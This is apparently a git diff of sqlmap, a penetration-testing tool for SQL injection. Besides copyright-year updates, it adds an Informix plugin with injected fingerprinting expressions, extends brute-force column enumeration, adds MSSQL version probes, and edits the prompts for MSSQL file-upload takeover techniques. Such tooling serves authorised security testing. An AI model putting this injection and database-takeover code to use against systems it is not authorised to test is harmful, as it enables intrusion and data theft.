b/plugins/dbms/hsqldb/syntax.py index c2927406b..b998fdd5c 100644 --- a/plugins/dbms/hsqldb/syntax.py +++ b/plugins/dbms/hsqldb/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py index 6d007a6b2..453cfcf89 100644 --- a/plugins/dbms/hsqldb/takeover.py +++ b/plugins/dbms/hsqldb/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/informix/__init__.py b/plugins/dbms/informix/__init__.py new file mode 100644 index 000000000..5d7972e46 --- /dev/null +++ b/plugins/dbms/informix/__init__.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import INFORMIX_SYSTEM_DBS +from lib.core.unescaper import 
unescaper + +from plugins.dbms.informix.enumeration import Enumeration +from plugins.dbms.informix.filesystem import Filesystem +from plugins.dbms.informix.fingerprint import Fingerprint +from plugins.dbms.informix.syntax import Syntax +from plugins.dbms.informix.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Informix methods + """ + + def __init__(self): + self.excludeDbsList = INFORMIX_SYSTEM_DBS + + Syntax.__init__(self) + Fingerprint.__init__(self) + Enumeration.__init__(self) + Filesystem.__init__(self) + Miscellaneous.__init__(self) + Takeover.__init__(self) + + unescaper[DBMS.INFORMIX] = Syntax.escape diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py new file mode 100644 index 000000000..48b52096c --- /dev/null +++ b/plugins/dbms/informix/connector.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +try: + import ibm_db_dbi +except ImportError: + pass + +import logging + +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: http://code.google.com/p/ibm-db/ + User guide: http://code.google.com/p/ibm-db/wiki/README + API: http://www.python.org/dev/peps/pep-0249/ + License: Apache License 2.0 + """ + + def __init__(self): + GenericConnector.__init__(self) + + def connect(self): + self.initConnection() + + try: + database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) + self.connector = ibm_db_dbi.connect(database, self.user, self.password) + except ibm_db_dbi.OperationalError, msg: + raise SqlmapConnectionException(msg) + + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except ibm_db_dbi.ProgrammingError, msg: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except ibm_db_dbi.InternalError, msg: + raise SqlmapConnectionException(msg[1]) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/informix/enumeration.py b/plugins/dbms/informix/enumeration.py new file mode 100644 index 000000000..4426f105e --- /dev/null +++ b/plugins/dbms/informix/enumeration.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def __init__(self): + GenericEnumeration.__init__(self) + + def searchDb(self): + warnMsg = "on Informix searching of databases is not implemented" + logger.warn(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Informix searching of tables is not implemented" + logger.warn(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Informix searching 
of columns is not implemented" + logger.warn(warnMsg) + + return [] + + def search(self): + warnMsg = "on Informix search option is not available" + logger.warn(warnMsg) diff --git a/plugins/dbms/informix/filesystem.py b/plugins/dbms/informix/filesystem.py new file mode 100644 index 000000000..b02afc7d3 --- /dev/null +++ b/plugins/dbms/informix/filesystem.py @@ -0,0 +1,12 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def __init__(self): + GenericFilesystem.__init__(self) diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py new file mode 100644 index 000000000..062af85ba --- /dev/null +++ b/plugins/dbms/informix/fingerprint.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import INFORMIX_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.INFORMIX) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.INFORMIX + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(INFORMIX_ALIASES): + setDbms(DBMS.INFORMIX) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.INFORMIX + logger.info(infoMsg) + + result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)") + + if result: + infoMsg = "confirming %s" % DBMS.INFORMIX + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX + logger.warn(warnMsg) + + return False + + setDbms(DBMS.INFORMIX) + + self.getBanner() + + if not conf.extensiveFp: + return True + + infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX + logger.info(infoMsg) + + for version in ("12.1", "11.7", "11.5"): + output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION','FULL') LIKE '%%%s%%')" % version) + + if output: + Backend.setVersion(version) + break + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX + logger.warn(warnMsg) + + return False diff 
--git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py new file mode 100644 index 000000000..5b5705b90 --- /dev/null +++ b/plugins/dbms/informix/syntax.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.common import randomStr +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + def __init__(self): + GenericSyntax.__init__(self) + + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") + 'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar' + """ + + def escaper(value): + return "||".join("CHR(%d)" % ord(_) for _ in value) + + excluded = {} + for _ in re.findall(r"DBINFO\([^)]+\)", expression): + excluded[_] = randomStr() + expression = expression.replace(_, excluded[_]) + + retVal = Syntax._escape(expression, quote, escaper) + + for _ in excluded.items(): + retVal = retVal.replace(_[1], _[0]) + + return retVal \ No newline at end of file diff --git a/plugins/dbms/informix/takeover.py b/plugins/dbms/informix/takeover.py new file mode 100644 index 000000000..d1964a673 --- /dev/null +++ b/plugins/dbms/informix/takeover.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def __init__(self): + self.__basedir = None + self.__datadir = None + + GenericTakeover.__init__(self) diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py index 9370a87c6..8427a1458 100644 --- a/plugins/dbms/maxdb/__init__.py +++ b/plugins/dbms/maxdb/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index 1f9feca61..125abae64 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 95ec6a385..81b450154 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -1,21 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.common import Backend from lib.core.common import randomStr +from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.data import queries +from lib.core.enums import DBMS from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import 
SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.utils.brute import columnExists from lib.utils.pivotdumptable import pivotDumpTable from plugins.generic.enumeration import Enumeration as GenericEnumeration @@ -38,7 +42,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching database names" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].dbs + rootQuery = queries[DBMS.MAXDB].dbs randStr = randomStr() query = rootQuery.inband.query retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) @@ -61,7 +65,7 @@ class Enumeration(GenericEnumeration): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() @@ -72,7 +76,7 @@ class Enumeration(GenericEnumeration): infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.MAXDB].tables for db in dbs: randStr = randomStr() @@ -91,7 +95,7 @@ class Enumeration(GenericEnumeration): return kb.data.cachedTables - def getColumns(self, onlyColNames=False): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -111,8 +115,19 @@ class Enumeration(GenericEnumeration): conf.db = safeSQLIdentificatorNaming(conf.db) + if conf.col: + colList = conf.col.split(',') + else: + colList = [] + + if conf.excludeCol: + colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + + for col in colList: + colList[colList.index(col)] = safeSQLIdentificatorNaming(col) + if conf.tbl: - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -129,7 +144,44 @@ class Enumeration(GenericEnumeration): for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) - rootQuery = queries[Backend.getIdentifiedDbms()].columns + if bruteForce: + resumeAvailable = False + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + resumeAvailable = True + break + + if resumeAvailable and not conf.freshQueries or colList: + columns = {} + + for column in colList: + columns[column] = None + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + columns[colName] = colType + + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns + else: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} + + return kb.data.cachedColumns + + message = "do you want to use common column existence check? 
[y/N/q] " + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + else: + return columnExists(paths.COMMON_COLUMNS) + + rootQuery = queries[DBMS.MAXDB].columns for tbl in tblList: if conf.db is not None and len(kb.data.cachedColumns) > 0 \ @@ -141,6 +193,12 @@ class Enumeration(GenericEnumeration): return {conf.db: kb.data.cachedColumns[conf.db]} + if dumpMode and colList: + table = {} + table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table + continue + infoMsg = "fetching columns " infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py index 00d14a7f0..fa74456da 100644 --- a/plugins/dbms/maxdb/filesystem.py +++ b/plugins/dbms/maxdb/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index 57f24fb88..6976be515 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -91,7 +91,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or (conf.dbms or "").lower() in MAXDB_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(MAXDB_ALIASES): setDbms(DBMS.MAXDB) self.getBanner() diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py index b8612b3a1..11eddc97a 100644 --- a/plugins/dbms/maxdb/syntax.py +++ b/plugins/dbms/maxdb/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py index 32d3a0969..cd38c715a 100644 --- a/plugins/dbms/maxdb/takeover.py +++ b/plugins/dbms/maxdb/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py index c701c0f9f..607d989dd 100644 --- a/plugins/dbms/mssqlserver/__init__.py +++ b/plugins/dbms/mssqlserver/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index 657d796fd..6439a468e 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 
2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -41,7 +41,7 @@ class Connector(GenericConnector): try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.InterfaceError, pymssql.OperationalError), msg: + except (pymssql.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) self.initCursor() @@ -50,7 +50,7 @@ class Connector(GenericConnector): def fetchall(self): try: return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: + except (pymssql.Error, _mssql.MssqlDatabaseException), msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) return None diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 9ea67eff9..64d54f70e 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -1,13 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.agent import agent from lib.core.common import arrayizeValue -from lib.core.common import Backend from lib.core.common import getLimitRange from lib.core.common import isInferenceAvailable from lib.core.common import isNoneValue @@ -22,6 +21,7 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException @@ -75,7 +75,7 @@ class Enumeration(GenericEnumeration): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() @@ -88,7 +88,7 @@ class Enumeration(GenericEnumeration): infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.MSSQL].tables if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: for db in dbs: @@ -152,7 +152,7 @@ class Enumeration(GenericEnumeration): warnMsg += "for database '%s'" % db logger.warn(warnMsg) - if not kb.data.cachedTables: + if not kb.data.cachedTables and not conf.search: errMsg = "unable to retrieve the tables for any database" raise SqlmapNoneDataException(errMsg) else: @@ -163,13 +163,16 @@ class Enumeration(GenericEnumeration): def searchTable(self): foundTbls = {} - tblList = conf.tbl.split(",") - rootQuery = queries[Backend.getIdentifiedDbms()].search_table + tblList = conf.tbl.split(',') + rootQuery = queries[DBMS.MSSQL].search_table tblCond = rootQuery.inband.condition tblConsider, tblCondParam = self.likeOrExact("table") - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + enumDbs = conf.db.split(',') elif not len(kb.data.cachedDbs): enumDbs = self.getDbs() else: @@ -184,7 +187,7 @@ class Enumeration(GenericEnumeration): infoMsg = "searching table" if 
tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -217,7 +220,7 @@ class Enumeration(GenericEnumeration): else: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -229,7 +232,7 @@ class Enumeration(GenericEnumeration): if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -260,13 +263,13 @@ class Enumeration(GenericEnumeration): self.dumpFoundTables(foundTbls) def searchColumn(self): - rootQuery = queries[Backend.getIdentifiedDbms()].search_column + rootQuery = queries[DBMS.MSSQL].search_column foundCols = {} dbs = {} whereTblsQuery = "" infoMsgTbl = "" infoMsgDb = "" - colList = conf.col.split(",") + colList = conf.col.split(',') if conf.excludeCol: colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] @@ -277,8 +280,11 @@ class Enumeration(GenericEnumeration): tblCond = rootQuery.inband.condition2 colConsider, colCondParam = self.likeOrExact("column") - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + enumDbs = conf.db.split(',') elif not len(kb.data.cachedDbs): enumDbs = self.getDbs() else: @@ -295,22 +301,25 @@ class Enumeration(GenericEnumeration): infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} if conf.tbl: - _ = conf.tbl.split(",") + _ = conf.tbl.split(',') whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + _ = conf.db.split(',') infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) + logger.info(msg) else: infoMsgDb = " across all databases" @@ -336,7 +345,7 @@ class Enumeration(GenericEnumeration): values = [values] for foundTbl in values: - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) + foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) if foundTbl is None: continue @@ -367,7 +376,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (column, db) logger.info("%s%s" % (infoMsg, infoMsgTbl)) @@ -380,7 +389,7 @@ class Enumeration(GenericEnumeration): if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % column warnMsg += "in database 
'%s'" % db logger.warn(warnMsg) diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index 53e197a0d..9d1edf9b8 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -382,27 +382,24 @@ class Filesystem(GenericFilesystem): if written is False: message = "do you want to try to upload the file with " message += "the custom Visual Basic script technique? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice.lower() == "y": + if readInput(message, default='Y', boolean=True): self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType) written = self.askCheckWrittenFile(wFile, dFile, forceCheck) if written is False: message = "do you want to try to upload the file with " message += "the built-in debug.exe technique? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice.lower() == "y": + if readInput(message, default='Y', boolean=True): self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType) written = self.askCheckWrittenFile(wFile, dFile, forceCheck) if written is False: message = "do you want to try to upload the file with " message += "the built-in certutil.exe technique? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice.lower() == "y": + if readInput(message, default='Y', boolean=True): self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType) written = self.askCheckWrittenFile(wFile, dFile, forceCheck) diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 8483b6429..5ce6b10a8 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -65,9 +65,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \ - or (conf.dbms or "").lower() in MSSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): + if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES): setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) self.getBanner() @@ -93,7 +91,9 @@ class Fingerprint(GenericFingerprint): for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \ ("2005", "XACT_STATE()=XACT_STATE()"), \ ("2008", "SYSDATETIME()=SYSDATETIME()"), \ - ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)")): + ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \ + ("2014", "CHARINDEX('12.0.2000',@@version)>0"), \ + ("2016", "ISJSON(NULL) IS NULL")): result = inject.checkBooleanExpression(check) if result: diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py index 314ba5c8d..2d220dd37 100644 --- a/plugins/dbms/mssqlserver/syntax.py +++ b/plugins/dbms/mssqlserver/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mssqlserver/takeover.py 
b/plugins/dbms/mssqlserver/takeover.py index e387d4095..1216c9a6e 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index 7baec6ce9..305971ddf 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 62e073425..4c6c2eb04 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,6 +11,7 @@ except ImportError: pass import logging +import struct from lib.core.data import conf from lib.core.data import logger @@ -38,6 +39,8 @@ class Connector(GenericConnector): self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) except 